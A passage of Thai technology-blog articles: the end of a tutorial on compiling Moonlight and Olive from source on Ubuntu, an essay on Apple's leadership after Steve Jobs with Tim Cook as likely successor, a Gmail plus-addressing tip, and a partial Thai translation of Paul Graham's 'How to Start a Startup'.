~/svn/ffmpeg && ./configure --prefix=/usr/local && make && sudo make install > ดาวน์โหลดและคอมไพล์ติดตั้ง Olive > $ cd ~/svn && svn checkout svn://anonsvn.mono-project.com/source/trunk/olive olive $ cd ~/svn/olive && ./configure --prefix=/usr && make && sudo make install > ขั้นตอนสุดท้าย ดาวน์โหลดและคอมไพล์ติดตั้ง Moonlight และปลั๊กอินสำหรับ Firefox > $ cd ~/svn && svn checkout svn://anonsvn.mono-project.com/source/trunk/moon moon $ cd ~/svn/moon && ./autogen.sh --prefix=/usr && make && sudo make install && make test-plugin > ในระหว่างการคอมไพล์อาจพบว่าคอมไพเลอร์ไม่พบแฟ้มที่จำเป็นสำหรับการคอมไพล์ ให้หาแฟ้มที่ต้องการจากเว็บไซต์ค้นหาแพกเกจที่ [http://packages.ubuntu.com/](http://packages.ubuntu.com/) จากนั้นติดตั้งแพกเกจที่มีแฟ้มดังกล่าว แล้วจึงคอมไพล์ใหม่อีกครั้ง ทดสอบว่าปลั๊กอินใช้การได้ โดยเปิดยูอาร์แอลต่อไปนี้ด้วย Firefox [http://intertwingly.net/stories/2007/05/06/?icon=caution](http://intertwingly.net/stories/2007/05/06/?icon=caution) จะเห็นการเปรียบเทียบระหว่างการวาดภาพกราฟิกแบบเวกเตอร์โดยใช้ Silverlight/Moonlight เปรียบเทียบกับเอสวีจีซึ่ง Firefox สนับสนุนโดยตรง ดังภาพต่อไปนี้ ภาพข้างบนนี้ กรอบสีฟ้าที่เขียนว่า "Visit the LEARN PAGE..." คือ Silverlight ที่ฝังลงในหน้าเว็บ ความสามารถที่น่าสนใจอย่างหนึ่งของ Moonlight คือการที่เราสามารถเขียนโปรแกรมบน Moonlight ด้วยภาษาที่ .NET/Mono สนับสนุน ซึ่งเมื่อคอมไพล์แล้วสามารถรันบนเดสก์ท็อปได้โดยตรงในทำนองเดียวกับ Dashboard ของ OS X โดยใน Moonlight จะเรียกว่า Desklet (อ่านรายละเอียดได้จาก[บทความของ Ars Technica](http://arstechnica.com/articles/culture/novell-hack-week-an-experiment-in-innovation.ars/2)) ตัวอย่างของ Desklet จะอยู่ในสารบบ > ~/svn/moon/desklet > ซึ่งสามารถคอมไพล์และเรียกใช้ได้ด้วยคำสั่ง mopen ดังตัวอย่างข้างล่างนี้ > $ cd ~/svn/moon/desklet/glassyclock && make $ cd ~/svn/moon/desklet && mopen --desklet glassyclock > จะได้ Desklet นาฬิกาแบบเข็มที่คอมไพล์จากสารบบ > ~/svn/moon/desklet/glassyclock > การเรียกใช้ Desklet อื่น ๆ ก็เป็นไปในทำนองเดียวกัน เท่าที่ได้ลองทดสอบดู รู้สึกประทับใจในความสามารถของ Moonlight (โดยเฉพาะอย่างยิ่งความง่ายของการพัฒนา Desklet) มากทีเดียว น่าติดตามว่าทิศทางการพัฒนาของโครงการนี้จะเป็นอย่างไรต่อไป ที่มา - ปรับปรุงเล็กน้อยจากที่บันทึกไว้ใน[บล็อกส่วนตัวของผู้เขียน](http://blog.phisite.in.th/)
# แอปเปิลในยุคที่ไม่มี "สตีฟ จ็อบส์” เมื่อสัปดาห์ที่ผ่านมา สตีฟ จ็อบส์ [ประกาศการลาป่วยรอบที่สาม](http://www.blognone.com/news/21140) หลังจากพบว่าเป็นมะเร็งในรอบแรก และต้องเปลี่ยนตับในรอบที่สอง รอบนี้แอปเปิลแทบไม่ได้ให้ข้อมูลอะไรเกี่ยวกับอาการป่วยของจ็อบส์เลย บอกเพียงแค่ "ลาป่วย" โดยไม่ระบุระยะเวลา น้อยกว่าคราวก่อนที่บอกว่าลาป่วย 6 เดือนด้วยซ้ำ ทุกคนย่อมอยากรู้ว่าจ็อบส์ป่วยเป็นอะไร อาการหนักเบาแค่ไหน มีโอกาสหายหรือไม่ ฯลฯ แต่นั่นคงไม่ใช่เรื่องที่สำคัญเท่ากับคำถามที่ว่า "แอปเปิลจะเป็นอย่างไรถ้าไม่มีสตีฟ จ็อบส์" ผมเชื่อว่าเราทุกคนปรารถนาให้จ็อบส์หายดี กลับมาเป็นสีสันให้วงการไอทีอีกครั้ง แต่เมื่อประเมินจากสถานการณ์แล้ว ไม่ว่าจ็อบส์จะกลับมาดำรงตำแหน่งซีอีโอได้หรือไม่ สิ่งที่แอปเปิลต้องยอมรับก็คือ ตอนนี้ถึงเวลาที่จะคิดถึง "การสืบทอด" ตำแหน่งของสตีฟ จ็อบส์เสียที แอปเปิลภายใต้การนำของสตีฟ จ็อบส์ โดดเด่นมากในเรื่อง "วิสัยทัศน์" ที่นำพาวงการไอทีเปลี่ยนผ่านจากคอมพิวเตอร์พีซีแบบดั้งเดิม เข้าสู่ยุคแห่งอุปกรณ์รูปแบบใหม่ๆ ที่แตกต่างออกไป แต่ตอบโจทย์เก่าๆ ได้ดีกว่าเดิม ความสำเร็จต่อเนื่องจาก iPod มายัง iPhone จนถึง iPad เป็นสิ่งที่ทุกคนต้องยอมรับ และเกียรติภูมิอันนี้คงยกให้ใครอื่นไม่ได้นอกจากสตีฟ จ็อบส์ นั่นเอง แต่สตีฟ จ็อบส์ ไม่มีวันอยู่กับแอปเปิลตลอดไป (ถึงแม้จะหายป่วยกลับมา และเป็นซีอีโอได้อีก 10-20 ปีก็ตาม มันก็ต้องมีวันที่ลงจากตำแหน่ง) และเมื่อถึงเวลานั้น แอปเปิลต้องถามตัวเองว่าต้องการ "วิสัยทัศน์" อยู่อีกหรือไม่ ถ้าให้ผมตอบคำถามนี้ ผมจะบอกว่า **"แอปเปิลต้องการวิสัยทัศน์"** แต่ไม่ต้องการ **"ผู้นำที่มีวิสัยทัศน์"** อีกต่อไปแล้ว เหตุผลประกอบมี 2 ข้อดังนี้ 1. จะหาใครที่มีวิสัยทัศน์ และมีคาแรกเตอร์ที่โดดเด่นเท่าสตีฟ จ็อบส์ได้อีก? 2. แอปเปิลไม่ต้องการ "วิสัยทัศน์" ใหม่ เพราะสตีฟ จ็อบส์ สร้างไว้ให้แล้วอย่างเหลือเฟือ ถ้าเราย้อนดูประวัติศาสตร์ของวงการไอที จะเห็นว่ายุคสมัยของไอทีเปลี่ยนไม่บ่อยนัก (แม้จะเร็วกว่าอุตสาหกรรมอื่นเยอะ) เช่น เราใช้พีซีกันมาร่วมสามสิบปี ใช้คีย์บอร์ดกันมานานกว่านั้น เว็บถูกใช้ในวงกว้างประมาณ 15 ปี (แม้จะวิวัฒนาการมาเรื่อยๆ แต่แนวคิดหลักยังเหมือนเดิม) วิสัยทัศน์ของจ็อบส์ต่อโลกไอทีในยุคหน้า คือ "อุปกรณ์ชนิดใหม่ๆ ที่ผูกกับบริการบนอินเทอร์เน็ต ตัดตอนความยุ่งยากของพีซีออกไป" ซึ่งถูกประดิษฐ์ขึ้นไม่นานมานี้ (iPod ในปี 2001 หรือจะเริ่มนับ iPhone ปี 2007) ยังไปต่อได้อีกมาก และใช้ต่อได้อีกนาน แอปเปิลยังไม่จำเป็นต้องปฏิรูป "ฐานราก" ของระบบคอมพิวเตอร์ใหม่อีกครั้งในช่วง 5 ปีข้างหน้านี้ และ "วิสัยทัศน์" อันนี้อาจมีอายุอยู่ได้ถึง 10 ปีหรือนานกว่านั้น (อนาคตไกลกว่านั้นค่อยคิดกันต่อไป) ดังนั้นสิ่งที่แอปเปิลต้องการในตอนนี้ไม่ใช่วิสัยทัศน์ แต่เป็นผู้บริหารที่สามารถบริหารงานภายใต้วิสัยทัศน์ที่จ็อบส์วางเอาไว้ ให้เดินหน้าไปได้อย่างไม่มีปัญหาอะไรมากกว่า ทิม คุก (Tim Cook) คือผู้บริหารคนนั้นหรือเปล่า? ผมว่าใกล้เคียงมาก ทิม คุก เข้าทำงานกับแอปเปิลตั้งแต่ปี 1998 หลังการกลับมาของสตีฟ จ็อบส์ไม่นานนัก เขามีชื่อเสียงจากการดูแล "สายปฎิบัติการ" (operation) ให้กับแอปเปิล โดยบริหารจัดการด้านการผลิต การจัดเก็บสต๊อค ซัพพลายเชน ฯลฯ ได้อย่างมีประสิทธิภาพ ส่งผลให้กำไรของแอปเปิลเพิ่มขึ้น (จากการลดต้นทุนเหล่านี้ลง) พูดง่ายๆ ว่าเป็นฝั่ง "หลังบ้าน" ของแอปเปิล ดูแลฐานของบริษัทให้พร้อมสำหรับ "แม่ทัพ" สตีฟ จ็อบส์ นำออกไปรบในสมรภูมิ ทิม คุกอยู่กับแอปเปิลมาสิบกว่าปี และซึมซับการบริหารงานของสตีฟ จ็อบส์ อย่างใกล้ชิดมาโดยตลอด เขาจึงรู้จักแอปเปิลมากกว่าใคร (ยกเว้นจ็อบส์) จากข้อมูลของ [Wall Street Journal](http://blogs.wsj.com/digits/2009/01/15/when-steve-jobs-met-tim-cook/) ระบุว่าตอนที่จ็อบส์กลับมาใหม่ๆ และต้องการตัวผู้บริหารมาช่วยดูแลงานภายในบริษัท จ็อบส์สัมภาษณ์คนเยอะมาก แต่ไม่ "คลิก" กับใครเลย (มีผู้บริหารคนหนึ่งที่จ็อบส์สัมภาษณ์เพียง 5 นาทีแล้วเดินออกจากห้อง) แต่เขากลับชอบบุคลิกหนักแน่นเยือกเย็นของคุก และเข้ากันได้เป็นอย่างดี คุกพิสูจน์ตัวเองแล้วว่า เขาสามารถนำพาแอปเปิลเดินหน้าตามวิสัยทัศน์ของจ็อบส์ได้อย่างไม่มีปัญหา ในช่วงที่จ็อบส์ลาพัก 6 เดือนในปี 2009 ผมเชื่อว่าในระยะยาวแล้ว ไม่ว่าจ็อบส์จะกลับมาทำงานได้หรือไม่ คุกจะได้รับการเสนอชื่อเป็นซีอีโอคนต่อไป มากกว่าการหาซีอีโอคนนอกเข้ามาแทนจ็อบส์ และด้วยทิศทางแบบนี้ แอปเปิลในอนาคตจะยังมีแนวทางของผลิตภัณฑ์แบบเดิม (สตีฟ จ็อบส์ สไตล์) แต่มีการนำเสนอและจัดองค์กรที่ต่างไปจากเดิม คือ บริหารเป็นองค์คณะ ไม่มีผู้นำที่โดดเด่นเพียงคนเดียวอีกต่อไป เราจะเห็นผู้บริหารคนอื่นๆ ของแอปเปิลอย่าง Scott Forstall, Jonathan Ive และ Philip W. Schiller มีบทบาทในงานแถลงข่าวมากขึ้น แอปเปิลในยุคหลังสตีฟ จ็อบส์ (Post-Jobs) ที่ใช้โครงสร้างการบริหารเป็นทีม (โดยมีหัวหน้าทีมชื่อทิม คุก) จะประสบความสำเร็จมากน้อยแค่ไหน เป็นเรื่องที่เราต้องติดตามดูกันต่อไป แต่ผมคิดว่าเป็นโครงสร้างที่เหมาะกับแอปเปิลมากที่สุดแล้ว ถ้าให้อธิบายด้วยกรอบของ "[สามก๊กไอที](http://www.blognone.com/news/19536)" ก็ต้องบอกว่ายุคของ "จิวยี่" ผู้โดดเด่นหมดไปแล้ว เป็นหน้าที่ของ "ซุนกวน" และทีมขุนศึก-ที่ปรึกษาจะดูแล "ง่อก๊ก" ต่อไป ข้อมูลบางส่วนจาก - [Everything You Need To Know About Tim Cook, Apple's COO](http://www.businessinsider.com/everything-you-need-to-know-about-tim-cook-apples-coo-2011-1#ixzz1BpRhVk9F) \- Business Insider - [Steve Jobs Should Be Apple's Last Rock Star CEO](http://www.informationweek.com/news/software/bi/showArticle.jhtml?articleID=229000837) \- InformationWeek - [Meet Apple's New Boss, The Most Powerful Gay Man in Silicon Valley](http://valleywag.gawker.com/5736917/meet-apples-new-boss-the-most-powerful-gay-man-in-silicon-valley?skyline=true&s=i) \- Gawker
# เทคนิคการใช้ E-mail Address ขั้นสูงสำหรับผู้ใช้ Gmail แนะนำเทคนิคการใช้ E-mail Address ขั้นสูงสำหรับผู้ใช้ Gmail โดยเราสามารถใช้เทคนิคที่เรียกว่า “plus addressing” ในการส่งอีเมล์เข้าหาตัวเราได้ ทำให้ง่ายต่อการใช้ Filter กรองจดหมาย ซึ่งมีวิธีการดังนี้ - สมมุติว่าอีเมล์ Gmail ของเราคือ [email protected] เวลาเรานำอีเมล์ไปกรอกตามเว็บไซต์ต่างๆ เช่นเว็บของทาง Bank เราสามารถใช้ [email protected] ก็ได้ ซึ่งหากมีคนส่งมาที่อีเมล์ดังกล่าว เราก็จะได้รับจดหมายเข้า [email protected] ตามปกติ เพียงแต่เมล์ฉบับนั้นจะมีช่อง To: [email protected] แทน ทำให้เราสามารถใช้ Filter ในการกรองจดหมายได้ง่ายขึ้น เช่นถ้าช่อง To: มี +bank ให้ย้ายไป Folder Bank เป็นต้น - เนื่องจากมีบางเว็บไซต์ไม่รองรับชื่ออีเมล์ที่มีเครื่องหมาย + ในกรณีนี้มีทางแก้อีกวิธีหนึ่งโดยให้ใช้วิธี "one or several dots" แทนก็คือการใช้ . (เครื่องหมายจุด) ในส่วนของชื่ออีเมล์ตรงไหนก็ได้ โดยอาจจะเป็นจุดเดียว หรือ มากกว่า 1 จุดก็ได้เช่น [email protected], [email protected], [email protected] ซึ่งทั้ง 3 อีเมล์ข้างบนนี้ก็ล้วนส่งไปที่ [email protected] เช่นเดียวกัน ที่มา : CybernetNews
# Paul Graham: วิธีการเริ่มต้นเปิดบริษัทของตัวเอง **เกริ่นนำ:** บทความนี้แปลจากบทความ [How to Start a Startup](http://paulgraham.com/start.html) ของ [Paul Graham](http://paulgraham.com/) นักลงทุนด้านไอที เจ้าของบริษัท [Y Combinator](http://ycombinator.com/) ผู้อยู่เบื้องหลังความสำเร็จของบริษัทอย่าง Dropbox, Disqus, Scribd, reddit [Paul Graham](http://paulgraham.com/bio.html) เป็นผู้ประกอบการไอทีตั้งแต่สมัยอินเทอร์เน็ตบูมใหม่ๆ เขาเริ่มเปิดบริษัท Viaweb เป็นบริการออนไลน์สำหรับร้านค้าผ่านเว็บในปี 1995 แล้วขายให้ยาฮูในปี 1998 ด้วยมูลค่า 49.5 ล้านดอลลาร์ จากนั้นในปี 2005 เขาก็มาเปิดบริษัท Y Combinator เป็นโรงเรียนสอนวิชาสตาร์ตอัพให้กับบริษัทรุ่นหลัง บทความนี้เป็นจุดตั้งต้นให้เขาเปิดบริษัทนักลงทุนในสตาร์ตอัพ มันถูกเขียนขึ้นในปี 2005 แต่เนื้อหาหลายอย่างยังทันสมัยอยู่ ผมตัดสินใจแปลมาเพราะคิดว่าน่าจะเป็นประโยชน์แก่แวดวงไอทีในบ้านเรา โดยเฉพาะเด็กรุ่นใหม่ๆ ที่อยากเปิดบริษัทไอทีของตัวเอง น่าจะใช้เป็นบทเรียนได้บ้างพอสมควรครับ - mk ## วิธีการเริ่มต้นเปิดบริษัทของตัวเอง ต้นฉบับจาก [How to Start a Startup](http://paulgraham.com/start.html) มีนาคม 2005 (บทความนี้ดัดแปลงจากเนื้อหาในการพูดที่สมาคมคอมพิวเตอร์ฮาร์วาร์ด \- Harvard Computer Society) ในการสร้างบริษัทสตาร์ตอัพที่ประสบความสำเร็จ คุณต้องมีเงื่อนไข 3 อย่าง ได้แก่ ร่วมงานกับคนที่เหมาะสม สร้างสิ่งที่ผู้ใช้ต้องการจริงๆ และใช้เงินให้น้อยที่สุดเท่าที่เป็นไปได้ บริษัทที่ล้มเหลวส่วนใหญ่เกิดจากความผิดพลาดอย่างใดอย่างหนึ่งนี้ และบริษัทที่ทำตามเงื่อนไขได้ครบทั้ง 3 ประการ ย่อมมีโอกาสสูงที่จะประสบความสำเร็จดังที่หวัง จุดดึงดูดของเรื่องนี้อยู่ที่ว่า เงื่อนไขทั้ง 3 ข้อนี้เป็นสิ่งที่มนุษย์สามารถทำให้สำเร็จได้ ถึงแม้มันจะยาก แต่ความยากของมันอยู่ในระดับที่พอกระทำได้ และเมื่อบริษัทสตาร์ตอัพประสบความสำเร็จ ผู้ก่อตั้งมักจะร่ำรวย เราก็สามารถสรุปได้ว่า การไล่ตามความฝันที่อยากร่ำรวยเป็นเรื่องที่เป็นไปได้ ถึงแม้มันจะเป็นเรื่องยาก แต่ก็มีคนทำได้สำเร็จมาเป็นจำนวนไม่น้อยแล้ว ถ้าผมสามารถให้คำแนะนำแก่สตาร์ตอัพได้เพียงข้อเดียว ผมก็จะพูดข้อความข้างต้นนี้ มันไม่มีขั้นตอนไหนที่ยากเกินไปจนผิดธรรมชาติ และมีแค่อัจฉริยะเท่านั้นที่สามารถทำได้สำเร็จ ## ไอเดีย ถ้าจะว่ากันตามตรงแล้ว คุณไม่จำเป็นต้องมีไอเดียที่วิเศษเลิศเลอสักเท่าไรในการสร้างบริษัทสตาร์ตอัพใดๆ เพราะกลไกการทำเงินของสตาร์ตอัพเกิดจากการสร้างเทคโนโลยีที่ดีกว่าปัจจุบันให้แก่ผู้คน แต่เมื่อเทคโนโลยีส่วนใหญ่ในทุกวันนี้มักจะห่วยอยู่ก่อนแล้ว คุณก็ไม่จำเป็นต้องใช้สมองมากมายนักหรอกในการพัฒนามันให้ดีขึ้น ตัวอย่างที่ดีในเรื่องนี้คือกูเกิล แผนการที่แท้จริงของกูเกิลนั้นเป็นสิ่งที่เรียบง่ายและตรงไปตรงมามากกว่าที่คุณคิด นั่นคือ “การสร้างเว็บไซต์ค้นหาที่มันไม่ห่วย” เท่านั้นเอง ไอเดียของกูเกิลมีเพียง 3 อย่างที่เป็นของใหม่ ได้แก่ ทำดัชนีเว็บให้เยอะขึ้นกว่าเดิม นำลิงก์มาช่วยจัดอันดับผลการค้นหา และทำหน้าเว็บสะอาดๆ เรียบง่าย มีโฆษณาตามคีย์เวิร์ดที่ไม่เกะกะสายตา ปัจจัยทั้ง 3 ข้อนี้ทำให้กูเกิลใช้งานง่ายมาก และถึงแม้ว่ากูเกิลจะมีเทคนิคลับเฉพาะทางวิศวกรรมอยู่บ้างบางเรื่อง แต่ตัวแผนยุทธศาสตร์โดยรวมของกูเกิลนั้นตรงไปตรงมามาก ไม่มีอะไรซับซ้อน และแผนง่ายๆ แค่นี้กลับสามารถทำเงินให้กูเกิลมากกว่า 1 พันล้านดอลลาร์ต่อปี [1] (ตัวเลขปี 2005 - ผู้แปล) วงการไอทียังมีอีกหลายแง่มุมที่ตัวเทคโนโลยีห่วยพอๆ กับเทคโนโลยีการค้นเว็บยุคก่อนจะมีกูเกิลเกิดขึ้นในโลก ผมสามารถคิดไอเดียสำหรับตั้งบริษัทสตาร์ตอัพให้คุณได้ แต่พื้นฐานของไอเดียเหล่านี้เหมือนกันหมด นั่นคือ จงมองหาสิ่งที่ผู้ใช้ต้องทำเป็นประจำอยู่แล้ว และหาวิธีปรับปรุงมันให้หลุดพ้นจากความห่วยแตกสักที อีกตัวอย่างหนึ่งคือเว็บหาคู่เดทออนไลน์ เว็บเหล่านี้แย่กว่าเว็บค้นหายุคก่อนกูเกิลด้วยซ้ำ เกือบทุกแห่งใช้วิธีจับคู่แบบง่ายๆ โดยอิงจากข้อมูลของบุคคลที่เก็บอยู่ในฐานข้อมูล แทนที่จะอิงจากการเดทกันของคนในโลกจริงๆ ผมเชื่อว่านักศึกษาด้านคอมพิวเตอร์สามารถปรับปรุงกระบวนการพวกนี้ได้ ด้วยความยากระดับโครงงานปริญญาตรีเท่านั้น ตอนนี้เว็บหาคู่เดทกลายเป็นธุรกิจขนาดใหญ่ไปแล้ว ดังนั้นถ้ามีใครสามารถหาวิธีปรับปรุงมันแบบเจ๋งๆ ก็อาจสร้างมูลค่าได้มากกว่าที่เป็นอยู่ถึง 100 เท่าก็เป็นได้ ไอเดียเป็นแค่เพียงจุดเริ่มต้นสำหรับบริษัทสตาร์ตอัพเท่านั้น คนที่อยากเป็นผู้ประกอบการมักคิดกันว่า กุญแจสำคัญของการตั้งบริษัทอยู่ที่ ”ไอเดียตั้งต้น” และดำเนินธุรกิจตามแนวคิดของไอเดียนั้น แต่พวกนักลงทุนทั้งหลายกลับเข้าใจความจริงของการก่อตั้งบริษัทมากกว่านั้นมาก ถ้าคุณลองไปเสนอสุดยอดไอเดียที่คุณคิดว่าเจ๋งสุดๆ ให้กับบริษัทเวนเจอร์แคปปิตอล (VC) โดยกำหนดเงื่อนไขพวกเขาว่าต้องเซ็นสัญญาห้ามเผยแพร่ข้อมูลต่อบุคคลภายนอก (NDA - non-disclosure agreement) บริษัทส่วนใหญ่จะบอกให้คุณกลับบ้านไปเสียดีกว่า เรื่องนี้แสดงให้เห็นว่าไอเดียมีค่าน้อยแค่ไหน จงรู้เอาไว้ว่าตลาดไอทีให้ความสำคัญกับไอเดียสุดเจ๋งของคุณ น้อยกว่าความยุ่งยากในการเซ็นสัญญา NDA เสียอีกนะ อีกตัวอย่างหนึ่งที่แสดงให้เห็นว่าไอเดียสำหรับตั้งบริษัทของคุณในตอนนี้มีค่าน้อยกว่าที่คุณคิด คือในความจริงแล้ว สตาร์ตอัพจำนวนมากเปลี่ยนแผนการของตัวเองระหว่างทาง เดิมที ไมโครซอฟท์ตั้งใจจะทำเงินจากการขายภาษาโปรแกรม แต่รูปแบบธุรกิจในปัจจุบันของไมโครซอฟท์ค่อยโผล่มาอีก 5 ปีหลังจากตั้งบริษัทแล้ว ในตอนที่ไอบีเอ็มโผล่มาเสนอทำธุรกิจร่วมกันต่างหาก แน่นอนว่าไอเดียก็มีคุณค่าในตัวของมันอยู่ระดับหนึ่ง แต่ปัญหาคือคุณค่านี้ไม่สามารถถ่ายโอนไปยังคนอื่นได้ คุณไม่สามารถนำไอเดียไปบอกคนอื่นแล้วหวังว่าพวกเขาจะทำตามไอเดียของคุณได้สำเร็จ ความสำคัญของไอเดียคือการเป็น "จุดตั้งต้น" ให้เจ้าของไอเดียยึดเป็นหลักคิด และครุ่นคำนึงถึงมันตลอดเวลา สิ่งที่สำคัญไม่ใช่ไอเดีย แต่เป็นคนที่คิดไอเดียเหล่านั้นต่างหาก คนเก่งสามารถแก้ไขไอเดียห่วยๆ ได้ แต่ไอเดียดีๆ ไม่สามารถช่วยคนห่วยๆ ให้กลับมาประสบความสำเร็จได้ ## คน ที่ผมบอกว่า "คนเก่ง" นั้นหมายถึงอะไรกันแน่? เทคนิคอย่างหนึ่งที่ผมเรียนรู้จากประสบการณ์การตั้งบริษัทของผม คือวิธีการพิจารณาว่าควรจะจ้างพนักงานคนไหนบ้าง เทคนิคคือคุณต้องอธิบายบุคลิกของคนว่าเหมือนกับสัตว์ชนิดใด เรื่องนี้อาจอธิบายเป็นภาษาอื่นได้ยาก แต่ผมคิดว่าคนอเมริกันทุกคนน่าจะเข้าใจเรื่องนี้ พนักงานบางคนอาจทำงานไม่ค่อยจริงจัง บางคนอาจทำงานได้ดีเกินไปจนกลายเป็นย้ำคิดย้ำทำ บุคลิกของพนักงานแต่ละคนจะดีหรือแย่นั้นขึ้นกับตำแหน่งงานของเขาด้วย ลองจินตนาการว่าหากเรานำคนที่ไม่มีวันยอมรับคำปฏิเสธมาเป็นเซลส์ นำคนที่ยอมนอนตอนตีสี่แต่ไม่ยอมปล่อยบั๊กทิ้งไว้มาเป็นโปรแกรมเมอร์ นำคนที่ยินดีโทรหานักข่าวผู้เย่อหยิ่งของนิวยอร์กไทมส์มาเป็นประชาสัมพันธ์ นำคนที่ไม่ยอมให้สัดส่วนรูปภาพเพี้ยนแม้เพียงแค่สองมิลลิเมตรมาเป็นกราฟิกดีไซน์ มันจะมีผลดีต่อบริษัทมากแค่ไหน งานของพนักงานทุกคนที่ทำให้บริษัทจะเปรียบได้กับสัตว์แต่ละชนิด ทำงานในหน้าที่ที่ต่างกันออกไป ผมเคยรู้จักผู้หญิงคนหนึ่งที่ทำงานเป็นเซลส์ เธอกัดไม่ปล่อยจนบางครั้งผมรู้สึกแย่แทนลูกค้าที่คุยโทรศัพท์กับเธอ คุณอาจเห็นว่าโครงการนี้ไม่ค่อยคืบหน้า แต่คุณจะรู้แน่นอนว่าลูกค้าคงโดนตามจนเหนื่อยไปอีกนาน จะยุติเมื่อเขายอมเซ็นสัญญาซื้อของของเราเท่านั้น ถ้าคุณลองเทียบคนที่คุณรู้จักกับบุคลิกของสัตว์ คุณจะรู้ว่าเทคนิคนี้ไม่ยากเลย ลองคิดเทียบดูว่าเพื่อนเราคนนี้เหมือนสัตว์ชนิดไหน ถ้าคุณหัวเราะขึ้นมาแปลว่าเทียบผิดเสียแล้ว คุณอาจไม่จำเป็นต้องใช้เทคนิคนี้ในการจ้างงานของบริษัทขนาดใหญ่ แต่สำหรับสตาร์ตอัพ คุณจำเป็นต้องทำแบบนี้ ในกรณีที่เราต้องการสัมภาษณ์งานในตำแหน่งโปรแกรมเมอร์ เราจะเพิ่มเงื่อนไขการทดสอบเพิ่มอีก 3 อย่าง ได้แก่ คนนี้ฉลาดจริงหรือเปล่า, ถ้าฉลาด เขาสามารถทำงานจนเสร็จได้หรือเปล่า, สุดท้าย แฮ็กเกอร์จำนวนมากมีบุคลิกส่วนตัวที่น่ารำคาญไม่น่าคบหา ดังนั้นคำถามคือ เราจะทนอยู่กับเขาได้หรือไม่? อย่างไรก็ตาม คนที่ผ่านการทดสอบข้อสุดท้ายกลับมีเยอะกว่าที่คิด เพราะคนเราสามารถทนความเนิร์ดได้ในระดับหนึ่ง ถ้าหากว่าเนิร์ดคนนั้นฉลาดพอ แต่สิ่งที่เราทนไม่ได้คือคนที่ชอบโชว์ความเก่งของตัวเอง ซึ่งคนเหล่านี้ส่วนมากไม่ค่อยฉลาด และมักจะตกการทดสอบข้อแรกไปเกือบหมดแล้ว บุคลิกแย่ๆ ของเนิร์ดมักเกิดจากพวกเขาพยายามมากเกินไปเพื่อให้ตัวเองดูฉลาด แต่ถ้าเขาฉลาดจริงๆ เขาจะมีแรงกดดันให้พยายามทำตัวให้ฉลาดน้อยลง ดังนั้นถ้าคุณเจอคนที่สามารถพูดว่า "ไม่รู้สิครับ" "คุณอาจจะถูกนะ" "ผมไม่เข้าใจเรื่องนี้ดีพอ" ก็แปลว่าพวกเขาน่าจะฉลาดจริงๆ ไม่ได้เสแสร้งว่าฉลาด เทคนิคนี้อาจไม่เวิร์คเสมอไป เพราะบุคลิกของคนอาจได้อิทธิพลมาจากสภาพแวดล้อมด้วย ในภาควิชาวิทยาการคอมพิวเตอร์ที่ MIT มีธรรมเนียมของการพยายามแสดงตัวว่ารู้ทุกเรื่องฝังลึกอยู่ ผมได้ยินมาว่าค่านิยมนี้ถอดแบบมาจากบุคลิกของ Marvin Minsky ศาสตราจารย์ด้าน AI ชื่อดังของ MIT (เฉกเช่นเดียวกับบุคลิกของนักบินพาณิชย์สมัยก่อนถอดแบบมาจาก Chuck Yeager) ดังนั้น บางครั้งคนฉลาดจริงๆ อาจทำตัวลักษณะนี้ได้ คณอาจต้องมีข้อยกเว้นให้ในบางกรณี โชคดีที่วงการไอทีมีคนอย่าง Robert Tappan Morris ผู้ที่ยินดีจะพูดคำว่า "ผมไม่รู้" มากกว่าใครๆ ที่ผมรู้จัก (เขาเป็นคนบุคลิกแบบนี้ ตั้งแต่ก่อนเป็นศาสตราจารย์ที่ MIT) ทำให้ไม่มีใครกล้าไปโชว์เก๋ากับ Robert เนื่องจากเขาฉลาดกว่าคนพวกนี้มากและเป็นคนที่ถ่อมตัวมาก บริษัทของผมก็เหมือนกับบริษัทสตาร์ตอัพทั่วไป ตั้งโดยกลุ่มเพื่อนๆ ที่รู้จักกันอยู่ก่อนแล้ว และเราก็จ้างคนเพิ่มผ่านคอนเนคชันส่วนตัว ลักษณะแบบนี้เป็นสิ่งที่บริษัทหน้าใหม่กับบริษัทขนาดใหญ่แตกต่างกันอย่างสิ้นเชิง เพราะคุณสามารถเรียนรู้ตัวตนของใครบางคน จากการเป็นเพื่อนกับเขาเพียงแค่วันสองวัน ได้มากกว่าการสัมภาษณ์งานของบริษัทไม่ถึงชั่วโมง [2] ไม่ใช่เรื่องบังเอิญที่สตาร์ตอัพมักเกิดขึ้นรอบๆ มหาวิทยาลัย เหตุผลก็คือคนฉลาดๆ มาอยู่ร่วมกันที่นี่ และในความเป็นจริงแล้ว คนพวกนี้ไม่ได้สร้างบริษัทขึ้นมาจากสิ่งที่เรียนในห้องหรอก แต่มันเกิดจากการที่พวกเขาเจอกันในงานแคมป์ไฟต่างหาก ถ้าคุณเริ่มตั้งบริษัท ก็เป็นไปได้สูงที่คุณจะเลือกร่วมงานกับเพื่อนมหาวิทยาลัยหรือเพื่อนจากชั้นเรียนปริญญาโท แต่ถ้าถามว่าคุณควรจะเป็นเพื่อนกับคนฉลาดๆ ให้มากที่สุดเท่าที่เป็นไปได้ตั้งแต่สมัยเรียนหรือเปล่า มันก็ไม่จำเป็นขนาดนั้นหรอก เพราะการสร้างมิตรภาพกับแฮ็กเกอร์ด้วยวิธีนี้กลับไม่ค่อยเวิร์คนัก สิ่งที่คุณควรทำขณะเรียนมหาวิทยาลัยคือพัฒนาโครงการซอฟต์แวร์ของคุณเองขึ้นมา (ทุกคนที่อยากเป็นแฮ็กเกอร์ควรหัดทำแบบนี้ ถึงแม้จะไม่สนใจเรื่องการตั้งบริษัทก็ตาม เพราะมันเป็นวิธีการหัดเขียนโปรแกรมที่ได้ผลจริงมากที่สุด) บางทีคุณอาจได้ทำงานนี้ร่วมกับเพื่อนนักศึกษาคนอื่นๆ และนี่เป็นวิธีที่ดีที่สุดในการเรียนรู้ว่าแฮ็กเกอร์คนอื่นเก่งแค่ไหน โครงการพวกนี้อาจพัฒนามาเป็นผลิตภัณฑ์ของบริษัทในภายหลังได้ แต่ผมก็ไม่อยากให้คุณยึดติดกับโครงการต่างๆ มากนัก ปล่อยให้มันเป็นเรื่องธรรมชาติว่าสุดท้ายจะพัฒนาไปอย่างไร แต่ในขั้นต้น การทำงานในสิ่งที่คุณชอบร่วมกับคนที่คุณถูกคอก็เพียงพอแล้ว จำนวนผู้ก่อตั้งบริษัทที่เหมาะสมควรอยู่ระหว่าง 2-4 คน การเปิดบริษัทด้วยตัวเองคนเดียวเป็นเรื่องยาก เพราะการตัดสินใจเรื่องต่างๆ 